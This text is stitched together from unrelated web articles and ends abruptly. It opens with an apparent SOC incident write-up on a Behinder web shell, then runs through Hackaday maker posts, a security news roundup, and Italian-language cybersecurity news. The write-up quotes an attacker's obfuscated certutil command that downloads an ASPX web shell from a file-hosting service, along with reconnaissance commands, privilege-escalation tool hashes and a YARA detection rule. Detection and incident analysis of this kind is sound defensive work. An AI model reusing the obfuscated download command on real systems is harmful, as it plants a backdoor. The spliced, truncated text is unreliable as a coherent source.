Web shells have evolved far beyond their original purpose of basic remote command execution, and many now function more like lightweight exploitation frameworks. These tools often include features such as in-memory module execution and encrypted command-and-control (C2) communication, giving attackers flexibility while minimizing their footprint.
This article walks through a SOC investigation where efficient surface-level analysis led to the identification of a web shell associated with a well-known toolset commonly associated with Chinese-speaking threat actors. Despite being a much-discussed tool, it is still used by the attackers for post-exploitation activities, thanks to its modular design and adaptability. We’ll break down the investigative process, detail how the analysts uncovered the web shell family, and highlight practical detection strategies to help defenders identify similar threats.
Onset
It’s early Monday morning, almost 4am UTC time, and the apparent nighttime calm inside the SOC is abruptly interrupted by an alert from our SIEM. It indicates that Kaspersky Endpoint Security’s heuristic engine has detected a web shell (HEUR:Backdoor.MSIL.WebShell.gen) on the SharePoint server of a government infrastructure in Southeast Asia, a warning that no SOC analyst would want to ignore. C:\Windows\System32\inetsrv\w3wp.exe -ap "SharePoint" [...] └── "cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il -u""""r""""l""""c""""a""""c""""h""""e"""" -split -f hxxps://bashupload[.]com/[REDACTED]/404.aspx 404.aspx └── C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\[REDACTED]\[REDACTED]\App_Web_404.aspx.[REDACTED].[REDACTED].dll The night shift team springs into action, knowing that the web shell could be the beginning of much worse activity, and that every second counts. Initial analysis of the telemetry suggests that the attackers exploited the affected web server, either by taking advantage of another web shell or a command injection vulnerability.
From the listing above, where the process tree that triggered the first detection is reported, it is possible to observe an attempt to deploy a web shell disguised as a 404 page. The certutil utility was used to download the ASPX payload, which was hosted by abusing Bashupload. This web service, which is used to upload files from the command line and allows one-time downloads of samples, is no stranger to being abused as an ingress tool transfer technique.
As is common practice, the command has been slightly obfuscated by using escape characters (such as ^ and “) to break up the keywords “certutil” and “urlcache” in order to bypass basic detection rules based on simple pattern matching. As part of our MDR service, we are required to operate within pre-established boundaries that are tailored to the customer’s business continuity needs and risk tolerance. In this case, the customer retains ownership of decisions regarding sensitive assets, including the isolation of compromised hosts, so we can’t instantly block the attack and must continue to observe and perform a preliminary threat analysis.
A manual reconnaissance and discovery activity by an operator starts appearing, and despite the tension, an occasional typo (“localgorup”) manages to draw a smile: whoami net user query user net localgorup administrators net localgroup administrators whoami /all "cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il[...]
Aftermath
To gain system privileges, the threat actors used several variants of the well-known Potato tools, either as memory-only modules or as standalone executables: Paths: C:\ProgramData\DRM\god.exe C:\Users\Default\Videos\god.exe MD5: 0xEF153E1E216C80BE3FDD520DD92526F4 Description: GodPotato
Process: C:\Windows\System32\inetsrv\w3wp.exe MD5 (memory region): 0xB8A468615E0B0072D2F32E44A7C9A62F Description: BadPotato Original filename: BadPotato.dll MD5 (memory region): 0xB5755BE4AAD8D8FE1BD0E6AC5728067B Description: SweetPotato Original filename: SweetPotato.dll To bring standalone binaries into the environment, the attackers again used the Bashupload free web service, which we saw in the initial web shell alert. Of all the tools, the GodPotato standalone binary ultimately succeeded in gaining system privileges.
With elevated access, the attackers moved on to domain trust enumeration, mapping relationships between domains and identifying potential targets for lateral movement. But let’s get back to the main question: What kind of web shell are we dealing with here?
Identifying the threat
Unfortunately, we were unable to retrieve the web shell sample used during the initial access phase. However, starting with the privilege escalation phase, several .NET modules began to appear in the memory of the IIS worker process ( w3wp.exe), ranging from popular tools like Potato to other lesser known ones. One set of libraries in particular caught our attention, so we decided to investigate further by performing a manual inspection. Fortunately, the libraries were not obfuscated and lent themselves to quick static analysis:
Example of a library detected in IIS process memory (0x0B593115C273A90886864AF7D4973EED)
In the image above, if you look at the orange method names in the Assembly Explorer on the left, you can observe some peculiarities that can be used to identify similar samples. Although many of the methods names are very generic, there is one that is quite unique, EnjsonAndCrypt. A quick Google search of this name yields no results, which means it may be sample-specific. The getExtraData method is also interesting: although it has a non-specific name, there is a sequence of bytes [126, 126, 126, 126, 126, 126] that is used to parse key:value pairs whose value is base64 encoded: The “extraData” structure example
Threat actors need to use the same byte sequence if they want to maintain backward compatibility across different implant versions, but since it is also very generic, we should combine both indicators, the getExtraData name and this byte array, to define a sufficiently precise detection condition that can be used in conjunction with EnjsonAndCrypt to create a detection rule.
Uncovering modules and variants
By feeding our newly created YARA rule to a multi-AV platform such as VirusTotal, we can identify additional samples that differ from those observed in the targeted infrastructure. It is worth noting that some of these have a poor detection rate:
Below are the most common names of libraries that match the rule: BShell.dll BasicInfo.dll Cmd.dll Database.dll Echo.dll Eval.dll FileOperation.dll Hs.dll LoadNativeLibrary.dll Loader.dll Plugin.dll PortMap.dll RealCMD.dll RemoteSocksProxy.dll ReversePortMap.dll SocksProxy.dll Transfer.dll Utils.dll Module filenames
Those familiar with the toolkit used may have already identified it by looking at these filenames, but if not, it is also possible to infer the relationship by simply pivoting to the samples available on VT:
Sample FC793D722738C7FCDFE8DED66C96495B relations on VT
Behinder, also known as Rebeyond, Ice Scorpion, 冰蝎 (Bīng xiē), is known as a cross-platform web shell designed to be compatible with most popular web servers running PHP, Java or ASP.NET as in our investigation. Although the web shell sample itself is very lightweight and somewhat basic, the tool includes a powerful GUI for operators with numerous capabilities including loading additional modules and giving them full control over compromised environments.
Its built-in AES-encrypted communication allows threat actors to maintain stealthy control over a compromised web server, often bypassing traditional network detection mechanisms, and its modular, flexible nature allows malicious actors to use it as a base for customization even though it is only available as a pre-built tool on GitHub. Moreover, the presence of several step-by-step Chinese language tutorials on CSDN (Chinese Software Developer Network) makes it widely accessible to opportunistic bad actors.
The bigger picture
Taking a step back, the relationship between the memory artifacts observed on the customer’s server during the post-exploitation phase and the web shell source code becomes evident. The web shell is not just a foothold, it’s a fully functional backdoor that facilitates encrypted communication with the operators’ infrastructure, allowing them to call built-in or custom-loaded libraries, deploy additional tools, conduct reconnaissance and exfiltrate data while remaining hidden:
ASPX web shell side by side with .NET payload
Although the Behinder web shell has been widely discussed in the past, especially the PHP and JSP variants, it is still a current and evolving cyberweapon. Even if attackers make mistakes or act carelessly by reusing the same encryption keys or exhibiting the same patterns, we can’t afford to let our guard down. In the incident described in this article, if we had not taken the time to dig deeper into the artifacts observed in memory, we likely would have missed the toolkit altogether.
Threats evolve quickly, and signature-based malware detection only catches what we already know. Underestimating the potential of memory-based payloads can lead to a false sense of security. Teams may assume that if they haven’t detected any suspicious files, they are safe, when in fact threats may be actively operating in memory.
For SOC teams, continuous learning, proactive threat hunting, and refining detection techniques are essential to staying ahead of adversaries.
Happy hunting and see you on the next mission!
YARA rule
rule dotnetFrozenPayload { strings: $CorDllMain_mscoree_dll = {00 5F 43 6F 72 44 6C 6C 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C 00} $EnjsonAndCrypt = {00 45 6E 6A 73 6F 6E 41 6E 64 43 72 79 70 74 00} $getExtraData = {00 67 65 74 45 78 74 72 61 44 61 74 61 00} $extraDataMagicArray = {00 7E 7E 7E 7E 7E 7E 00} //0x00, byte[] {126, ...,}, 0x00 condition: uint16(0) == 0x5A4D and filesize < 400000 and $CorDllMain_mscoree_dll and ( $EnjsonAndCrypt or ( $getExtraData and $extraDataMagicArray ) ) }
River tables are something we’ve heard decried as a passé, but we’re still seeing some interesting variations on the technique. Take this example done with bronze instead of epoxy.
Starting with two beautiful slabs of walnut, [Burls Art] decided that instead of cutting them up to make guitars he would turn his attention to a river table to keep them more intact. Given the price of copper and difficulty in casting it, he decided to trim the live edges to make a more narrow “river” to work with for the project.
Since molten copper is quite toasty and wood likes to catch on fire, he wisely did a rough finish of the table before making silicone plugs of the voids instead of pouring metal directly. The silicone plugs were then used to make sand casting molds, and a series of casting trials moving from copper to bronze finally yielded usable pieces for the table. In case that all seems too simple, there were then several days of milling and sanding to get the bronze and walnut level and smooth with each other. The amount of attention to detail and plain old elbow grease in this project is impressive.
If you’ve ever seen those cheap LED fiber optic wands at the dollar store, you’ve probably just thought of them as a simple novelty. However, as [Ancient] shows us, you can turn them into a surprisingly nifty little display if you’re so inclined.
The build starts by removing the fiber optic bundle from the wand. One end is left as a round bundle. At the other end, the strands are then fed into plastic frames to separate them out individually. After plenty of tedious sorting, the fibers are glued in place in a larger rectangular 3D-printed frame, which holds the fibers in place over a matrix of LEDs. The individual LEDs of the matrix light individual fibers, which carry the light to the round end of the bundle. The result is a tiny little round display driven by a much larger one at the other end.
[Ancient] had hoped to use the set up for a volumetric display build, but found it too fragile to be fit for purpose. Still, it’s interesting to look at nonetheless, and a good demonstration of how fiber optics work in practice. As this display shows, you can have two glass fibers carrying completely different wavelengths of light right next to each other without issue.
We’ve featured some other great fiber optic hacks over the years, like this guide on making your own fiber couplings. Video after the break.
Fluid simulations are a key tool in fields from aerospace to motorsports and even civil engineering. They can be three-dimensional and complicated and often run on supercomputer clusters bigger than your house. However, you can also do simple two-dimensional fluid simulations on very simple hardware, as [mircemk] demonstrates.
This build is almost like a simple toy that displays particles rolling around and tumbling as you turn it one way or the other. Behind the scenes, an ESP32 is running the show, simulating a group of particles responding to gravity in a fluid-like manner. The microcontroller is hooked up with an 3-axis gyroscope and accelerometer, which it uses to track motion and influence the motion of the particles in turn. The results of the simple fluid simulation are displayed on a screen made up of a 16 x 16 matrix of WS2812B addressable RGB LEDs, which add enough color to make the build suitably mesmerizing.
There’s something compelling about turning the display and watching the particles tumble and flow, particularly when they’re all set to different colors. [mircemk] also gave the build the ability to operate in several different modes, running “sand,” “liquid” and “gas” simulations and with dynamic coloring to boot.
The original locking wheel. Shopping carts are surprisingly expensive. Prices range up to about $300 for a cart, which may seem like a lot, but they have to be pretty rugged and are made to work for decades. Plastic carts are cheaper, but not by much.
And carts have a way of vanishing. We’ve seen estimates that cart theft costs hundreds of millions of dollars worldwide annually. To stem the tide, stores sometimes pay a reward to people to round up carts off the street and return them to the store — it’s cheaper than buying a new one. That led [Elmer Isaacks] to patent a solution to this problem in 1968.
The [Isaacks] system used lots of magnets. A cart leaving the store had a brake that would be armed by running over a magnet. Customers were expected to follow a path surrounded by magnets to prevent the brake from engaging. If you left the track, a rod passing through the wheel locked it.
A third magnet would disarm the brake when you entered the store again. This is clever, but it has several problems. First, you have to insert magnets all over the place. Second, if someone knows how the system works, a simple magnet will hold the brake off no matter what. The original modern-style court from a 1946 paten There are some low-tech ways to stop theft, too. For example, if the store has barriers too narrow for the carts to pass, customers can’t leave the store. That’s not very nice if you are trying to get a week’s worth of stuff to your car. You sometimes see poles on carts rising taller than the door, to prevent the cart from leaving the building, which, of course, has the same problem.
Some stores, particularly Aldi, require a small deposit to get a cart. You get the deposit back when you return the cart. This not only discourages theft but also cuts down on having to hire kids to round up carts in the parking lot. The problem is that the deposit is usually a low-denomination coin, so if you really want to steal a $200 shopping cart, losing a quarter is probably not much of a deterrent.
Higher Tech
Building on the [Isaacks] solution, more modern systems use a perimeter fence — usually a wire, but sometimes magnets — that causes the brake to engage if you roll the cart over it.
This drives the cost up and is expensive to install. Worse, if you only have one wheel lock, a smart customer could lift that wheel off the ground and bypass the virtual fence. That means you probably want two locking wheels, although that still doesn’t preclude a strong thief or two thieves from carrying the cart over the line. You can see a breakdown of what’s happening in the Science Channel video below.
Smart cart locks can also help solve “pushout,” an industry term for people filling a cart and walking out without paying. A properly equipped cart can determine if it exits the store without going through a checkout line. This is probably error-prone and not foolproof, but it might stop many pushouts.
Many common carts use 7.8 kHz signals on the sensing wire. Since that’s within the range of audio, you can actually hack them pretty easily.
A DEFCON presentation shows how you can use your phone to lock and unlock shopping carts. Not that we suggest you do that. As [Joseph Gabay] notes: “I never really wanted a shopping cart, but…I have the knowledge that if I wanted a shopping cart, I could have one.” His video below shows many of the internal details of some of the common shopping cart systems.
You’d think a shopping cart was about the simplest thing you’d deal with all day. But, like many things these days, it conceals some very high-tech electronics. And it seems like there should be some better options. Locking wheels might be fine when you have someone actually stealing, but if you ever have a cart lock up while you are moving quickly, it isn’t pleasant.
If you become super interested in shopping carts, the National Museum of American History has a section of shopping carts. Why not? People get obsessed with strange things. If the modern system seems familiar, maybe you are thinking of invisible doggie fences. If you want to hack a cart, you probably want to buy your own to start with.
This week, Hackaday’s Elliot Williams and Kristina Panos met up in a secret location with snacks to bring you the latest news, mystery sound, and of course, a big bunch of hacks from the previous week.
First up in the news, and there’s a lot of it: we announced the Hackaday Europe 2025 workshops and a few more speakers, though the big keynote announcement is still to come. In case you missed it, KiCad 9 moved up into the pro league, and finally, we’re hiring, so come join us in the dungeon.
On What’s That Sound, Kristina didn’t get close at all, but at least had a guess this time. That’s okay, though, because nobody got it right! We’re still giving a t-shirt away to [Dakota], though, probably because Elliot has a thing for using random number generators.
Then it’s on to the hacks and such beginning with a beautiful handheld compass CNC and cyanotype prints made with resin printer’s UV light. After that, we take a look at open-source random numbers, a 3D-printed instant camera, and a couple of really cool cyberdecks. Finally, we discuss whether DOOM is doomed as the port of choice in this day and age, and kvetch about keyboards.
Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!
[Kelly Coffield] makes intake manifolds for old Ford throttle bodies for fun, demonstrating an excellent technique for making such things in the small shop. The mould patterns are CNC machined from a solid polystyrene block, with all the necessary gates to feed the aluminium into the mould. The principle is to introduce aluminium from a large central runner into the mould structure, which feeds the gates into the mould parts. The various foam mould components are then glued with an extra brace bar at the bottom to strengthen it. Dip coating with a refractory slurry The complete structure is then sprayed with surfactant (just plain old soapy water) and dip-coated in a refractory slurry. The surfactant adjusts the coating’s surface tension, preventing bubbles from forming and ruining the surface quality produced by this critical coating step.
Once a satisfactory coating has been applied and hardened, the structure is placed inside a moulding pan fitted with a pneumatic turbine vibrator, to allow sand to be introduced. The vibrations ease the flow of sand into all the nooks and crannies, fully supporting the delicate mould structure against the weight of the metal, and gases produced as the foam burns away. A neat offset pouring cup is then added to the top of the structure and packed in with more sand to stabilise it. It’s a simple setup that can easily be replicated in any hackerspace or backyard for those motivated enough. [Kelly] is using A356 aluminium alloy, but there’s no reason this technique won’t work for other metals.
It was amusing to see [Kelly] demould by just dumping out the whole stack onto the drive and throwing the extracted casting into a snow bank after quenching. We might as well use all that free Midwest winter cooling capacity! After returning to the shop, [Kelly] would typically perform any needed adjustments, such as improving flatness in the press, while the part was in the ‘as cast temper’ condition. We’ll gloss over the admission of cutting the gates off on the table saw! After these adjustments, the part is artificially aged to a T5-like specification, to give it its final strength and machinability properties. There are plenty more videos on this process on the channel, which is well worth a look.
Now there’s a quirk to this story. No one has been able to answer a simple yet vital question: What exactly did the theme plugin do that was malicious? The official response is that “A theming extension with heavily obfuscated code and unreasonable dependencies including a utility for running child processes”. Looking at the official statements and unofficial security reviews, I can’t find confirmation that the plugins have actually been observed doing something malicious. The only concrete problem is that the plugin shipped obfuscated JavaScript. There are several incomplete statements about a problem with a sanity.io dependency that may have been compromised.
The conclusion at this point is that a thorough security review of these plugins has not been published. The Microsoft team found enough problematic elements in the plugins to trigger pulling them. But I join the chorus of voices calling on Microsoft to clearly answer the vital question: Have any users of Material Theme plugins actually been compromised?
Low-hanging Backups
NAKIVO backup has an interesting endpoint, the getImageByPath call that’s used for loading the system’s logo, and is accessible for unauthenticated users. It’s pretty simple, just taking a path to a file on the appliance filesystem, and returning the byte array for use as an image. And of course, it doesn’t check whether the requested file is actually an image. Nor is it limited to a list of allowed paths.
So hence we essentially have an arbitrary file read. It’s not entirely arbitrary, as the file is first loaded into memory before being served. So the backups themselves are likely too big to successfully exfiltrate in this way. There are still some rather interesting targets, including the system logs. But the real juicy target is the system database itself. Thankfully, the user credentials for the NAVIKO system itself seem to be properly hashed to avoid casual theft. But setting up useful backups will require all sorts of integrations, like SSH and AWS credentials. And those are stored in plain text inside the database. Whoops.
The logic here seems to be that not offering any end-to-end encrypted backup system for UK users is a better choice than claiming to offer such a system that actually contains a backdoor. That’s doubly true, as the law in question doesn’t seem to limit itself to UK users. If the UK government doesn’t back down on their extremely questionable demands, the next major step may be for Apple to pull sales from the country entirely.
Crypto Heist
We have a pair of crypto heist stories this week, with the first one being the largest in history. At a staggering $1.5 Billion, this seems like the biggest single theft of any kind to ever be successfully pulled off. And the details of how it was done are still a bit murky. The funds were stolen out of a Bybit “multisig” cold wallet. Those are clever currency stores that actually include smart contracts in the storage mechanism, requiring multiple owners to sign off on transactions.
It’s believed that this hack was pulled off by North Korean agents, through the use of very clever but simple techniques: Social engineering, and UI manipulation. In essence, a request for digital signature that claimed to do something benign, that actually unlocked the funds for theft. Some things never seem to change.
And that’s not all that’s happening with Cryptocurrency these days. It turns out that there’s another dead-simple attack that is targeting job-seeking individuals, instead of huge companies. “We may have a job for you, go to this website and run this application to apply!” Rather than a legitimate videoconferencing or interviewing application, the download is a simple backdoor. It’s used primarily to find crypto wallets and siphon the funds out.
Wallbleed
Remember Heartbleed? That’s the glitch in OpenSSL from 2014, where the TLS heartbeat implementation could trivially leak large amounts of system memory. Wallbleed is a strangely similar bug in the implementation of the Chinese Great Firewall system. One way the Great Firewall does censorship is via DNS injection. Request the DNS information for a blocked domain, and the firewall will intercept that request in real time, and return a spoofed response with a bogus IP address for the requested domain. Importantly for this discussion, that spoofing is bi-directional. You can send DNS requests to Chinese IP addresses, and get spoofed responses from the Great Firewall.
DNS request and response packets use an interesting variable length transport system, where the domain name being requested is turned into a set of length-value pairs. example.com is represented as 07example03com00. 7 bytes for the domain, then 3 bytes for the TLD, and a terminating null. Many of us are immediately wondering, what happens if that query was packed incorrectly: 07example20com00? There aren’t actually 20 bytes in the query, so what do various DNS responders do when handed such a query? Well-written DNS servers recognize that this is garbage, and just drop the packet. Some of the great firewall infrastructure did something far more interesting. It spoofs the DNS response, and performs a buffer over-read when constructing the response. Yes, leaking a few bytes of raw system memory back to the requester, a la Heartbleed.
And when we say “a few bytes”, the maximum observed leakage in a single spoofed response was 125. As you might imagine, that’s quite a bit of data. Enough data, in fact, to learn quite a bit about the Great Firewall and what sort of traffic it sees. There were also what appeared to be x86_64 pointers and Linux stack frames.
This attack was first discovered by researchers in 2021 and finally completely fixed in March 2024. In the intermediate time, those researchers used the vulnerability quite heavily to mine the Great Firewall infrastructure for data. This is an interesting ethical question. Normally it’s considered completely unacceptable to weaponize a vulnerability beyond what’s needed as a proof of concept. The Great Firewall is in some ways an adversarial device, making exploitation a bit murkier. On the other hand, vulnerabilities like this a usually disclosed in order to get them fixed. What is a researcher’s responsibility in this case, when the vulnerability is in a censorship device? It seems the Chinese authorities discovered the Wallbleed vulnerability themselves, excusing researchers from needing to fully answer this particular ethical question.
Bits and Bytes
It’s not surprising to open up an electronic device, and find an ugly glob of potting compound spread over one or several of the key chips inside. Or for some devices, the compound is ubiquitous, covering everything. [Graham Sutherland] has some thoughts on how to defeat the stuff. And while some is obvious, like using a drill press to very carefully expose a target interface, there are some really inventive ideas I would never have considered, like throwing an entire board into a pressure cooker for an hour!
How long does it take for a cyber criminal to go from initial access on an internal machine, to full access to a privileged computer? In the ReliaQuest case, it was 48 minutes. The hack was simple and clever. Start a mass spam and phishing campaign, and then pose as a helpful IT worker who could help end the carnage. All it takes is one employee to fall for the fake help desk routine, and 48 minutes.
Let’s say you wanted to pirate music from a streaming service like Deezer, but you really didn’t want your IP address or machine associated with the piracy. What would you do? Use Tor? VPNs? How about create a malicious PyPi package that does your downloading for you. That seems to be the bizarre case of automslc, a reasonably popular package that secretly downloads and scrapes from the music platform.
La Francia si sta preparando ad approvare leggi che potrebbero rivoluzionare la sicurezza online, obbligando i fornitori di servizi di telecomunicazioni a installare backdoor nelle app di messaggistica crittografata e limitando l’accesso alle risorse Internet tramite VPN. L’iniziativa ha suscitato aspre critiche da parte di Tuta (ex Tutanota) e della VPN Trust Initiative (VTI).
Il primo disegno di legge controverso è un emendamento alla legge francese sul narcotraffico, che impone ai servizi di comunicazioni criptate di fornire alle forze dell’ordine i messaggi decriptati dei sospettati entro 72 ore dalla richiesta. Il mancato rispetto degli obblighi comporterà sanzioni fino a 1,5 milioni di euro per le persone fisiche e fino al 2% del fatturato globale annuo per le aziende. Sebbene la legge non sia ancora entrata in vigore, è già stata approvata dal Senato francese e passerà all’esame dell’Assemblea nazionale.
Tuta ha chiamato i parlamentari che hanno respinto l’emendamento, sostenendo che indebolire la crittografia avrebbe creato vulnerabilità non solo per i criminali, ma anche per gli utenti comuni. L’azienda sottolinea che, anche se la backdoor viene creata nell’interesse delle forze dell’ordine, può essere utilizzata da criminali informatici e agenzie governative. Tuta ha sottolineato che tali iniziative violano le leggi dell’UE sulla protezione dei dati (GDPR) e anche gli standard tedeschi sulla sicurezza informatica.
Contemporaneamente, in Francia si sta valutando un’altra innovazione: l’obbligo per i servizi VPN di bloccare l’accesso ai siti pirata. La holding mediatica Canal+ e la Lega calcio francese (LFP) hanno lanciato un’iniziativa in tal senso, chiedendo ai provider Internet e ai servizi VPN di limitare l’accesso a determinate risorse web.
VPN Trust Initiative (VTI), che include AWS, Google, Cloudflare, Namecheap, OVH, IPVanish VPN, Ivacy VPN, NordVPN, PureVPN ed ExpressVPN, ha condannato una mossa del genere, affermando che la lotta alla pirateria non dovrebbe portare alla censura e alla violazione dei diritti degli utenti. Nella sua lettera aperta, l’organizzazione ha tracciato parallelismi tra l’iniziativa e le restrizioni imposte a Internet in altri paesi, tra cui Cina, Myanmar e Iran, sottolineando che tali misure costituiscono un precedente per la censura di massa.
La Francia non è l’unico Paese in cui il controllo sui dati Internet sta aumentando. Nel Regno Unito, il governo ha recentemente richiesto da Apple di fornire l’accesso ai backup crittografati di iCloud. In risposta, l’azienda ha spento l’opzione di crittografia end-to-end per gli utenti del Regno Unito. In Svezia è in preparazione un disegno di legge che obbligherà i messaggeri Signal e WhatsApp creare backdoor tecniche per fornire l’accesso ai messaggi crittografati.
Di recente è emersa anche la notizia che il capo dell’Europol Catherine De Bolle vuole collaborare con le principali aziende tecnologiche per ampliare la cooperazione con le forze dell’ordine sulle questioni relative alla crittografia. A suo avviso, il rifiuto di tale interazione potrebbe rappresentare una minaccia per la democrazia europea.
La Procura generale belga ha avviato un’indagine su una fuga di dati del Servizio di sicurezza dello Stato (VSSE) presumibilmente effettuata da hacker cinesi. Secondo quanto riferito, i criminali informatici hanno avuto accesso al server di posta elettronica esterno di VSSE tra il 2021 e maggio 2023, intercettando circa il 10% di tutte le e-mail inviate e ricevute dai dipendenti del dipartimento.
Il server compromesso è stato usato per comunicare con la procura, i ministeri, le forze dell’ordine e altri enti governativi. Inoltre, questo server è stato utilizzato da discussioni interne, che ha potenzialmente portato alla fuga di dati personali di dipendenti e candidati, compresi i loro curriculum e documenti di identità.
Il primo segnale dell’attacco è stato rilevato nel 2023, quando i media belgi hanno segnalato un incidente, che ha coinciso con la divulgazione di una vulnerabilità nei prodotti Barracuda. In seguito a ciò, VSSE ha smesso di utilizzare le soluzioni aziendali e ha raccomandato ai dipendenti di sostituire i documenti per ridurre il rischio di frode di identità.
Tuttavia, secondo fonti anonime, al momento non ci sono prove che i dati rubati siano apparsi sul darknet o siano stati utilizzati a fini di estorsione. Gli specialisti della sicurezza VSSE continuano a monitorare i forum underground e le piattaforme di trading alla ricerca di tracce e a potenziale fughe di dati. A peggiorare la situazione, l’attacco informatico è avvenuto in un momento in cui l’organizzazione era impegnata in un’importante campagna di assunzioni.
La VSSE ha rifiutato di rilasciare dichiarazioni, confermando solo che è stata presentata una denuncia formale in merito all’incidente. Allo stesso tempo, la Procura federale belga ha dichiarato che l’indagine è iniziata nel novembre 2023, ma è ancora troppo presto per trarre conclusioni. L’ambasciata della Cina in Belgio ha respinto le accuse, affermando che le autorità belghe non avevano fornito prove convincenti.
Si ritiene che l’attacco alla VSSE sia stato effettuato utilizzando una vulnerabilitàZero-Day nei Gateway di sicurezza della posta elettronica Barracuda (ESG). Nel 2023, gli specialisti Mandiant hanno attribuito attacchi mirati al gruppo UNC4841 che lavora per conto del governo cinese.
Microsoft ha rimosso due estensioni popolari, Material Theme – Free e Material Theme Icons – Free, da Visual Studio Marketplace, in quanto sospettate di contenere codice dannoso.
In totale, queste estensioni sono state scaricate quasi 9 milioni di volte e ora gli utenti ricevono avvisi che indicano che le estensioni sono state disattivate automaticamente. Il loro editore, Mattia Astorino (alias equinusocio), ha diverse altre estensioni nel Visual Studio Marketplace, con un totale complessivo di oltre 13 milioni di installazioni. Le informazioni secondo cui le estensioni potrebbero essere dannose provengono dai ricercatori di sicurezza informatica Amit Assaraf e Itay Kruk. Nel loro rapporto gli esperti hanno affermato di aver trovato codice sospetto nelle estensioni e di aver segnalato le loro scoperte a Microsoft.
I ricercatori sottolineano che il codice dannoso è stato iniettato nell’estensione tramite un aggiornamento, il che potrebbe indicare un attacco alla supply chain tramite una dipendenza o una compromissione dell’account dello sviluppatore. Un altro campanello d’allarme era la presenza di codice JavaScript fortemente offuscato nei file release-notes.js.
“Microsoft ha rimosso entrambe le estensioni dal marketplace di VS Code e bannato il loro sviluppatore”,ha detto un dipendente Microsoft a YCombinator. — Uno dei membri della community ha effettuato un’analisi approfondita della sicurezza di queste estensioni e ha trovato molti “segnali d’allarme” che indicavano intenti malevoli, per poi segnalarcelo. I ricercatori di sicurezza Microsoft hanno confermato queste affermazioni e hanno trovato ulteriore codice sospetto. Abbiamo bandito l’editore da VS Marketplace, rimosso tutte le sue estensioni e disinstallato tutte le istanze di VS Code che eseguivano tali estensioni. Per essere chiari, la rimozione non ha nulla a che fare con il copyright o con la licenza, ma solo con potenziali intenti malevoli”. Microsoft ha promesso di pubblicare a breve informazioni più dettagliate sull’attività dannosa nel repository VSMarketplace su GitHub.
Lo sviluppatore dell’estensione, Mattia Astorino, ha risposto alle domande sui potenziali pericoli delle estensioni affermando che i problemi erano causati da una dipendenza obsoleta di sanity.io che “sembra essere compromessa”. Secondo lui, non c’è mai stato nulla di dannoso nel Material Theme e l’unico problema era una dipendenza obsoleta di sanity.io, “che veniva utilizzata per visualizzare le note di rilascio del CMS headless sanity”.
“Questa dipendenza esiste dal 2016 e ha superato con successo tutti i controlli, ma ora sembra compromessa. Nessuno di Microsoft ci ha contattato per rimuoverlo. Hanno appena distrutto tutto, causando problemi a milioni di utenti e causando il blocco di VSCode (sì, è colpa loro). Hanno rotto tutto senza mai chiederci spiegazioni, scrive Astorino. — Rimuovere la vecchia dipendenza è stato un lavoro da 30 secondi, ma sembra che sia così che funziona Microsoft. Inoltre, forniamo un file index.js offuscato che contiene tutti i comandi e la logica del tema. È offuscato perché l’estensione è ora closed source. Se la rimuovi, l’estensione continuerà a funzionare con i normali file JSON.”
Finché la situazione non sarà chiarita, si consiglia agli utenti di rimuovere i seguenti file da tutti i progetti:
📣 Dal 12 al 14 marzo 2025 si svolgerà l’ottava edizione di Didacta Italia a Firenze, presso la Fortezza da Basso! Il #MIM sarà presente all’importante appuntamento dedicato alla formazione e all’innovazione scolastica con oltre 130 eventi, organizzat…
📣 Dal 12 al 14 marzo 2025 si svolgerà l’ottava edizione di Didacta Italia a Firenze, presso la Fortezza da Basso! Il #MIM sarà presente all’importante appuntamento dedicato alla formazione e all’innovazione scolastica con oltre 130 eventi, organizzat…
Se pensavate che la cybersecurity riguardasse solo i dati digitali, ecco una realtà ben più inquietante: 49.000 sistemi di controllo accessi (AMS) sono stati trovati esposti online, senza protezioni adeguate, mettendo a rischio la sicurezza fisica di edifici governativi, infrastrutture critiche e aziende in tutto il mondo.
Un’esposizione pericolosa
Esempi di sistemi di controllo accessi. Immagine dal sito Modat Secondo i ricercatori di Modat, questi AMS gestiscono l’accesso a strutture sensibili attraverso badge, sistemi biometrici e riconoscimento targhe. Tuttavia, le configurazioni errate di migliaia di dispositivi hanno lasciato le porte digitali spalancate, consentendo a chiunque di visualizzare e persino manipolare dati sensibili come:
Nomi, email e numeri di telefono degli impiegati
Dati biometrici come impronte digitali e riconoscimento facciale
Fotografie personali
Orari di lavoro e registri di accesso ai locali
E non è tutto: in alcuni casi, i ricercatori sono riusciti a modificare i record degli impiegati, creare utenti fittizi e alterare le credenziali di accesso, rendendo possibili scenari da film di spionaggio, in cui un attaccante potrebbe impedire l’ingresso a personale autorizzato o, peggio, concederlo a intrusi.
Italia in prima fila nell’esposizione
Posizione dei dispositivi AMS esposti. Immagine dal sito Modat A livello globale, i numeri sono allarmanti, ma c’è un dato che fa riflettere ancora di più: il paese con il maggior numero di AMS esposti è l’Italia, con ben 16.678 dispositivi vulnerabili. Seguono il Messico (5.940) e il Vietnam (5.035), mentre negli Stati Uniti il numero si attesta a 1.966.
Danni oltre la sicurezza fisica
Oltre al rischio di intrusioni fisiche, l’accesso a questi dati apre la porta a minacce informatiche di alto livello, come attacchi di spear-phishing e social engineering. Conoscere il nome di un dipendente, la sua email e il suo orario di lavoro consente ai cybercriminali di orchestrare attacchi mirati con un’efficacia devastante.
Come proteggersi?
Alcuni vendor hanno dichiarato di essere al lavoro con i clienti per mitigare il problema, ma la lentezza nelle risposte è preoccupante, considerando la gravità della falla.
Le misure per arginare il problema esistono e dovrebbero essere adottate immediatamente:
Spegnere l’accesso remoto: se il sistema non deve essere accessibile online, meglio rimuoverlo dalla rete pubblica.
Firewall e VPN: gli AMS devono essere dietro un firewall e accessibili solo tramite VPN sicure.
Cambio delle credenziali di default: sembra banale, ma molti sistemi sono ancora vulnerabili a brute-force perché usano username e password di fabbrica.
MFA e aggiornamenti: implementare l’autenticazione multi-fattore e installare gli aggiornamenti di sicurezza più recenti.
Crittografia e gestione dei dati: i dati biometrici e le informazioni personali devono essere sempre criptati, e i profili di ex-dipendenti devono essere cancellati per evitare usi fraudolenti.
Conclusione
